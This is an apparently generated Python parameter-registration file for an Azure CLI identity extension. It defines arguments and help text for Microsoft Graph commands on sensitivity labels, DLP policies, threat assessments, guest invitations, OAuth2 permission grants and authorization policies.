with self.argument_context('identitysignins information-protection list-threat-assessment-request') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-policy') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-sensitivity-policy-setting') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection show-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection update-data-loss-prevention-policy') as c:
c.argument('data_loss_prevention_policy_id', type=str, help='key: id of dataLossPreventionPolicy')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('name', type=str, help='')
with self.argument_context('identitysignins information-protection update-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('labels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection update-sensitivity-label') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection update-sensitivity-policy-setting') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('downgrade_sensitivity_requires_justification', arg_type=get_three_state_flag(), help='')
c.argument('help_web_url', type=str, help='')
c.argument('is_mandatory', arg_type=get_three_state_flag(), help='')
with self.argument_context('identitysignins information-protection update-threat-assessment-request') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('category', arg_type=get_enum_type(['undefined', 'spam', 'phishing', 'malware',
'unknownFutureValue']), help='')
c.argument('content_type', arg_type=get_enum_type(['mail', 'url', 'file']), help='')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('expected_assessment', arg_type=get_enum_type(['block', 'unblock']), help='')
c.argument('request_source', arg_type=get_enum_type(['undefined', 'user', 'administrator']), help='')
c.argument('status', arg_type=get_enum_type(['pending', 'completed']), help='')
c.argument('results', action=AddResults, nargs='+', help='A collection of threat assessment results. '
'Read-only. By default, a GET /threatAssessmentRequests/{id} does not return this property unless '
'you apply $expand on it.')
c.argument('application', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('device', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
c.argument('user', action=AddApplication, nargs='+', help='identity', arg_group='Created By')
with self.argument_context('identitysignins information-protection-data-loss-prevention-policy evaluate') as c:
c.argument('target', type=str, help='')
c.argument('author', type=str, help='', arg_group='Notification Info')
c.argument('access_scope', arg_type=get_enum_type(['inOrganization', 'notInOrganization']), help='',
arg_group='Evaluation Input')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel', arg_group='Evaluation '
'Input')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.', arg_group='Evaluation Input')
with self.argument_context('identitysignins information-protection-policy create-label') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('color', type=str, help='')
c.argument('description', type=str, help='')
c.argument('is_active', arg_type=get_three_state_flag(), help='')
c.argument('name', type=str, help='')
c.argument('parent', type=validate_file_or_dict, help='parentLabelDetails Expected value: '
'json-string/@json-file.')
c.argument('sensitivity', type=int, help='')
c.argument('tooltip', type=str, help='')
with self.argument_context('identitysignins information-protection-policy delete-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-policy list-label') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-policy show-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-policy update-label') as c:
c.argument('information_protection_label_id', type=str, help='key: id of informationProtectionLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('color', type=str, help='')
c.argument('description', type=str, help='')
c.argument('is_active', arg_type=get_three_state_flag(), help='')
c.argument('name', type=str, help='')
c.argument('parent', type=validate_file_or_dict, help='parentLabelDetails Expected value: '
'json-string/@json-file.')
c.argument('sensitivity', type=int, help='')
c.argument('tooltip', type=str, help='')
with self.argument_context('identitysignins information-protection-policy-label evaluate-application') as c:
c.argument('assignment_method', arg_type=get_enum_type(['standard', 'privileged', 'auto']), help='',
arg_group='Labeling Options')
c.argument('downgrade_justification', action=AddDowngradeJustification, nargs='+',
help='downgradeJustification', arg_group='Labeling Options')
c.argument('extended_properties', action=AddExtendedProperties, nargs='+', help='', arg_group='Labeling '
'Options')
c.argument('label_id', help='', arg_group='Labeling Options')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label evaluate-classification-result') as c:
c.argument('classification_results', action=AddClassificationResults, nargs='+', help='')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label evaluate-removal') as c:
c.argument('downgrade_justification', action=AddDowngradeJustification, nargs='+',
help='downgradeJustification')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label extract-label') as c:
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-sensitivity-label create-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection-sensitivity-label delete-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-sensitivity-label evaluate') as c:
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel')
with self.argument_context('identitysignins information-protection-sensitivity-label list-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-sensitivity-label show-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-sensitivity-label update-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection-sensitivity-label-sublabel evaluate') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel')
with self.argument_context('identitysignins information-protection-threat-assessment-request create-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('message', type=str, help='The result message for each threat assessment.')
c.argument('result_type', arg_type=get_enum_type(['checkPolicy', 'rescan', 'unknownFutureValue']), help='')
with self.argument_context('identitysignins information-protection-threat-assessment-request delete-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-threat-assessment-request list-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-threat-assessment-request show-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-threat-assessment-request update-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('message', type=str, help='The result message for each threat assessment.')
c.argument('result_type', arg_type=get_enum_type(['checkPolicy', 'rescan', 'unknownFutureValue']), help='')
with self.argument_context('identitysignins invitation-invitation create-invitation') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('invited_user_display_name', type=str, help='The display name of the user being invited.')
c.argument('invited_user_email_address', type=str, help='The email address of the user being invited. '
'Required. The following special characters are not permitted in the email address:Tilde '
'(~)Exclamation point (!)Number sign (#)Dollar sign ($)Percent (%)Circumflex (^)Ampersand '
'(&)Asterisk (*)Parentheses (( ))Plus sign (+)Equal sign (=)Brackets ([ ])Braces ({ })Backslash '
'(/)Slash mark (/)Pipe (/|)Semicolon (;)Colon (:)Quotation marks (\')Angle brackets (< >)Question '
'mark (?)Comma (,)However, the following exceptions apply:A period (.) or a hyphen (-) is permitted '
'anywhere in the user name, except at the beginning or end of the name.An underscore (_) is '
'permitted anywhere in the user name. This includes at the beginning or end of the name.')
c.argument('invited_user_type', type=str, help='The userType of the user being invited. By default, this is '
'Guest. You can invite as Member if you are a company administrator.')
c.argument('invite_redeem_url', type=str,
help='The URL the user can use to redeem their invitation. Read-only')
c.argument('invite_redirect_url', type=str, help='The URL the user should be redirected to once the invitation '
'is redeemed. Required.')
c.argument('reset_redemption', arg_type=get_three_state_flag(), help='')
c.argument('send_invitation_message', arg_type=get_three_state_flag(), help='Indicates whether an email should '
'be sent to the user being invited or not. The default is false.')
c.argument('status', type=str, help='The status of the invitation. Possible values: PendingAcceptance, '
'Completed, InProgress, and Error')
c.argument('invited_user', type=validate_file_or_dict, help='Represents an Azure Active Directory user object. '
'Expected value: json-string/@json-file.')
c.argument('cc_recipients', type=validate_file_or_dict, help='Additional recipients the invitation message '
'should be sent to. Currently only 1 additional recipient is supported. Expected value: '
'json-string/@json-file.', arg_group='Invited User Message Info')
c.argument('customized_message_body', type=str, help='Customized message body you want to send if you don\'t '
'want the default message.', arg_group='Invited User Message Info')
c.argument('message_language', type=str, help='The language you want to send the default message in. If the '
'customizedMessageBody is specified, this property is ignored, and the message is sent using the '
'customizedMessageBody. The language format should be in ISO 639. The default is en-US.',
arg_group='Invited User Message Info')
with self.argument_context('identitysignins invitation-invitation delete-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins invitation-invitation list-invitation') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation-invitation show-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation-invitation update-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('invited_user_display_name', type=str, help='The display name of the user being invited.')
c.argument('invited_user_email_address', type=str, help='The email address of the user being invited. '
'Required. The following special characters are not permitted in the email address: tilde (~), '
'exclamation point (!), number sign (#), dollar sign ($), percent (%), circumflex (^), '
'ampersand (&), asterisk (*), parentheses (( )), plus sign (+), equal sign (=), '
'brackets ([ ]), braces ({ }), backslash (\\), slash mark (/), pipe (|), semicolon (;), '
'colon (:), quotation marks (\'), angle brackets (< >), question mark (?), and comma (,). '
'However, the following exceptions apply: a period (.) or a hyphen (-) is permitted anywhere '
'in the user name except at the beginning or end of the name, and an underscore (_) is '
'permitted anywhere in the user name, including at the beginning or end of the name.')
c.argument('invited_user_type', type=str, help='The userType of the user being invited. By default, this is '
'Guest. You can invite as Member if you are a company administrator.')
c.argument('invite_redeem_url', type=str,
help='The URL the user can use to redeem their invitation. Read-only.')
c.argument('invite_redirect_url', type=str, help='The URL the user should be redirected to once the invitation '
'is redeemed. Required.')
c.argument('reset_redemption', arg_type=get_three_state_flag(), help='Reset the user\'s redemption status '
'and reinvite the user while retaining their user identifier, group memberships, and app '
'assignments.')
c.argument('send_invitation_message', arg_type=get_three_state_flag(), help='Indicates whether an email should '
'be sent to the user being invited or not. The default is false.')
c.argument('status', type=str, help='The status of the invitation. Possible values: PendingAcceptance, '
'Completed, InProgress, and Error')
c.argument('invited_user', type=validate_file_or_dict, help='Represents an Azure Active Directory user object. '
'Expected value: json-string/@json-file.')
c.argument('cc_recipients', type=validate_file_or_dict, help='Additional recipients the invitation message '
'should be sent to. Currently only 1 additional recipient is supported. Expected value: '
'json-string/@json-file.', arg_group='Invited User Message Info')
c.argument('customized_message_body', type=str, help='Customized message body you want to send if you don\'t '
'want the default message.', arg_group='Invited User Message Info')
c.argument('message_language', type=str, help='The language you want to send the default message in. If the '
'customizedMessageBody is specified, this property is ignored, and the message is sent using the '
'customizedMessageBody. The language format should be in ISO 639. The default is en-US.',
arg_group='Invited User Message Info')
with self.argument_context('identitysignins invitation delete-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins invitation set-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('body', type=validate_file_or_dict, help='New navigation property ref values. Expected value: '
'json-string/@json-file.')
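# Illustrative usage of a validate_file_or_dict argument: --body accepts inline
# JSON or @<file>; the reference payload below is a placeholder, not a verified
# schema:
#   az identitysignins invitation set-ref-invited-user --invitation-id <id> \
#       --body '{"@odata.id": "https://graph.microsoft.com/beta/users/<user-id>"}'
#   az identitysignins invitation set-ref-invited-user --invitation-id <id> --body @ref.json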
with self.argument_context('identitysignins invitation show-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation show-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant create-o-auth2-permission-grant') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='The id of the client service principal for the application which is '
'authorized to act on behalf of a signed-in user when accessing an API. Required. Supports $filter '
'(eq only).')
c.argument('consent_type', type=str, help='Indicates if authorization is granted for the client application to '
'impersonate all users or only a specific user. AllPrincipals indicates authorization to '
'impersonate all users. Principal indicates authorization to impersonate a specific user. Consent '
'on behalf of all users can be granted by an administrator. Non-admin users may be authorized to '
'consent on behalf of themselves in some cases, for some delegated permissions. Required. Supports '
'$filter (eq only).')
c.argument('expiry_time', help='')
c.argument('principal_id', type=str, help='The id of the user on behalf of whom the client is authorized to '
'access the resource, when consentType is Principal. If consentType is AllPrincipals this value is '
'null. Required when consentType is Principal.')
c.argument('resource_id', type=str, help='The id of the resource service principal to which access is '
'authorized. This identifies the API which the client is authorized to attempt to call on behalf of '
'a signed-in user.')
c.argument('scope', type=str, help='A space-separated list of the claim values for delegated permissions which '
'should be included in access tokens for the resource application (the API). For example, openid '
'User.Read GroupMember.Read.All. Each claim value should match the value field of one of the '
'delegated permissions defined by the API, listed in the publishedPermissionScopes property of the '
'resource service principal.')
c.argument('start_time', help='')
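# Illustrative usage (placeholder ids; note that --scope is a single quoted,
# space-separated claim list, per the help text above):
#   az identitysignins oauth2-permission-grant-o-auth2-permission-grant \
#       create-o-auth2-permission-grant \
#       --client-id <client-sp-id> --resource-id <resource-sp-id> \
#       --consent-type Principal --principal-id <user-id> \
#       --scope "openid User.Read"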
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant delete-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant list-o-auth2-permission-grant') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant show-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant update-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='The id of the client service principal for the application which is '
'authorized to act on behalf of a signed-in user when accessing an API. Required. Supports $filter '
'(eq only).')
c.argument('consent_type', type=str, help='Indicates if authorization is granted for the client application to '
'impersonate all users or only a specific user. AllPrincipals indicates authorization to '
'impersonate all users. Principal indicates authorization to impersonate a specific user. Consent '
'on behalf of all users can be granted by an administrator. Non-admin users may be authorized to '
'consent on behalf of themselves in some cases, for some delegated permissions. Required. Supports '
'$filter (eq only).')
c.argument('expiry_time', help='')
c.argument('principal_id', type=str, help='The id of the user on behalf of whom the client is authorized to '
'access the resource, when consentType is Principal. If consentType is AllPrincipals this value is '
'null. Required when consentType is Principal.')
c.argument('resource_id', type=str, help='The id of the resource service principal to which access is '
'authorized. This identifies the API which the client is authorized to attempt to call on behalf of '
'a signed-in user.')
c.argument('scope', type=str, help='A space-separated list of the claim values for delegated permissions which '
'should be included in access tokens for the resource application (the API). For example, openid '
'User.Read GroupMember.Read.All. Each claim value should match the value field of one of the '
'delegated permissions defined by the API, listed in the publishedPermissionScopes property of the '
'resource service principal.')
c.argument('start_time', help='')
with self.argument_context('identitysignins organization create-ref-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('body', type=validate_file_or_dict, help='New navigation property ref value. Expected value: '
'json-string/@json-file.')
with self.argument_context('identitysignins organization list-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins organization list-ref-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('orderby', nargs='+', help='Order items by property values')
with self.argument_context('identitysignins policy-policy-root show-policy-root') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-policy-root update-policy-root') as c:
c.argument('b2_c_authentication_methods_policy', action=AddB2CAuthenticationMethodsPolicy, nargs='+',
help='b2cAuthenticationMethodsPolicy')
c.argument('activity_based_timeout_policies', action=AddActivityBasedTimeoutPolicies, nargs='+', help='')
c.argument('authorization_policy', type=validate_file_or_dict,
help=' Expected value: json-string/@json-file.')
c.argument('claims_mapping_policies', action=AddClaimsMappingPolicies, nargs='+', help='')
c.argument('home_realm_discovery_policies', action=AddHomeRealmDiscoveryPolicies, nargs='+', help='')
c.argument('permission_grant_policies', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('private_link_resource_policies', action=AddPrivateLinkResourcePolicies, nargs='+', help='')
c.argument('token_issuance_policies', action=AddTokenIssuancePolicies, nargs='+', help='')
c.argument('token_lifetime_policies', action=AddTokenLifetimePolicies, nargs='+', help='')
c.argument('conditional_access_policies', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('identity_security_defaults_enforcement_policy',
action=AddIdentitySecurityDefaultsEnforcementPolicy, nargs='+', help='Represents an Azure Active '
'Directory object. The directoryObject type is the base type for many other directory entity types.')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.', arg_group='Directory Role Access Review '
'Policy')
c.argument('apply_actions', action=AddApplyActions, nargs='+', help='Expected value: KEY1=VALUE1 '
'KEY2=VALUE2 ...', arg_group='Directory Role Access Review Policy Settings')
c.argument('auto_apply_decisions_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('default_decision', type=str, help='', arg_group='Directory Role Access Review Policy Settings')
c.argument('default_decision_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('instance_duration_in_days', type=int, help='', arg_group='Directory Role Access Review Policy '
'Settings')
c.argument('justification_required_on_approval', arg_type=get_three_state_flag(), help='',
arg_group='Directory Role Access Review Policy Settings')
c.argument('mail_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('recommendations_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('recurrence', type=validate_file_or_dict, help='patternedRecurrence Expected value: '
'json-string/@json-file.', arg_group='Directory Role Access Review Policy Settings')
c.argument('reminder_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory '
'Role Access Review Policy Settings')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Admin Consent Request Policy')
c.argument('admin_consent_request_policy_is_enabled', arg_type=get_three_state_flag(), help='',
arg_group='Admin Consent Request Policy')
c.argument('notify_reviewers', arg_type=get_three_state_flag(), help='', arg_group='Admin Consent Request '
'Policy')
c.argument('reminders_enabled', arg_type=get_three_state_flag(), help='', arg_group='Admin Consent Request '
'Policy')
c.argument('request_duration_in_days', type=int, help='', arg_group='Admin Consent Request Policy')
c.argument('reviewers', action=AddReviewers, nargs='+', help='', arg_group='Admin Consent Request Policy')
c.argument('version', type=int, help='', arg_group='Admin Consent Request Policy')
c.argument('id1', type=str, help='Read-only.', arg_group='Device Registration Policy')
c.argument('id2', type=str, help='Read-only.', arg_group='Authentication Flows Policy')
c.argument('description', type=str, help='', arg_group='Authentication Flows Policy')
c.argument('display_name', type=str, help='', arg_group='Authentication Flows Policy')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='', arg_group='Authentication Flows Policy Self '
'Service Sign Up')
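# Illustrative usage of an action-based argument: arguments backed by an AddXxx
# action (for example --apply-actions above) take space-separated KEY=VALUE
# pairs, as the help text indicates; keys and values here are placeholders:
#   az identitysignins policy-policy-root update-policy-root \
#       --auto-apply-decisions-enabled true \
#       --apply-actions KEY1=VALUE1 KEY2=VALUE2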
with self.argument_context('identitysignins policy create-activity-based-timeout-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-authorization-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('allowed_to_sign_up_email_based_subscriptions', arg_type=get_three_state_flag(), help='')
c.argument('allowed_to_use_sspr', arg_type=get_three_state_flag(), help='')
c.argument('allow_email_verified_users_to_join_organization', arg_type=get_three_state_flag(), help='')
c.argument('allow_invites_from', arg_type=get_enum_type(['none', 'adminsAndGuestInviters',
'adminsGuestInvitersAndAllMembers', 'everyone',
'unknownFutureValue']), help='')
c.argument('block_msol_power_shell', arg_type=get_three_state_flag(), help='')
c.argument('default_user_role_permissions', action=AddDefaultUserRolePermissions, nargs='+',
help='defaultUserRolePermissions')
c.argument('enabled_preview_features', nargs='+', help='')
c.argument('guest_user_role_id', help='')
c.argument('permission_grant_policy_ids_assigned_to_default_user_role', nargs='+', help='')
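# Illustrative usage (the --allow-invites-from value comes from the
# get_enum_type list above; other values are placeholders):
#   az identitysignins policy create-authorization-policy \
#       --display-name "Authorization Policy" \
#       --allow-invites-from adminsAndGuestInviters \
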